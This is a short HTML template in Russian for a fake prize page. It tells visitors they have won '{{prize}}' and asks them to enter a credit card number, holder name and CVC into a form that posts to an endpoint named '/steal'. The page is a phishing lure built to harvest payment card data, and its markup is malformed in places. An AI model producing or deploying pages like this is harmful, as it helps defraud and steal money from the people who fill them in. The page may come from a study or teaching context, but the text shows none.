<!DOCTYPE html>
<html lang = 'en'>
<head>
	<meta charset="UTF-8">
	<title>Title</title>
</head>
</body>
<H1>Вы выиграли {{prize}}!</H1>
<p> Чтобы забрать приз введите данные кредитной карты: </p>
<form= action="/steal" method= "GET"
	<strong>Number</strong>
	<input type="text" name="Number"> </input>
	<strong>Holder</strong>
	<input type="text" name="Holder"> </input>
	<strong>CVC</strong>
	<input type="text" name="CVC"> </input>
	<input type ="submit" value="Забрать приз!">
</form>
</body>
</html>